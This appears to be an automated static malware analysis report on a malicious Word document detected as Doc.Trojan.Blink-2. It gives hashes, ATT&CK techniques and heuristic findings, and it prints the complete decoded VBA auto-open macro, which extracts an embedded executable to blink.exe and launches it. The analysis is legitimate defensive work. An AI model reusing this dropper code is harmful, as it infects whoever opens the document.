Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7743e0c1172bffe4…

MALICIOUS

Office (OLE)

Size: 37.0 KB | Created: 2000-04-15 21:13:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 9c8fb11d6e18ca7ccedc85fda6c2bfb6
SHA-1: fc1db37adfcc6349dfa7a33daae037c09be89d8e
SHA-256: 7743e0c1172bffe4c7095923dd6231759acae6c5e988205a864d425713327244
Risk Score: 308

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic | T1204.002 User Execution: Malicious File | T1105 Ingress Tool Transfer

The sample contains a VBA macro with an autoOpen subroutine, which runs automatically when the document is opened. The macro copies the document itself to disk, reads 8192 bytes at a fixed offset, writes those bytes out as an executable named 'blink.exe', and then launches it. The embedded executable is also detected by ClamAV as Doc.Trojan.Blink-2, indicating a known malicious payload.

Heuristics (7)

  • ClamAV: Doc.Trojan.Blink-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Blink-2
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document; possible embedded executable
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
      CloseFile h
      Shell "blink.exe", 4
      End Sub
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      Sub autoOpen()
      On Error Resume Next
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1540 bytes
SHA-256: 1921d50b92241ba66a514b8f61241fb2a45206e1f0fa5febe2908246b6e00e5c
Detection: ClamAV: Doc.Trojan.Blink-2
Obfuscation or payload: unlikely
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Blink"
Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Sub SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long)
Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long)

Sub autoOpen()
On Error Resume Next
'BLiNK by ULTRAS[MATRiX]
Dim doc As String, exe As String
Dim h As Long, p As Long
doc = "blink.doc"
exe = "blink.exe"
CopyFileA ActiveDocument.FullName, doc, 0
p = GlobalAlloc(0, 8192)
h = OpenFile(doc, 0)
SeekFile h, 29696, 0
ReadFile h, p, 8192
CloseFile h
h = CreateFile(exe, 0)
WriteFile h, p, 8192
CloseFile h
Shell "blink.exe", 4
End Sub
embedded_office_00007400.exe | embedded-pe | Office MZ+PE at offset 0x7400 | 8192 bytes
SHA-256: dcd63bfe778fb90f62aff754f3361f1ae08ad382808a59c47a3adf6897830cf5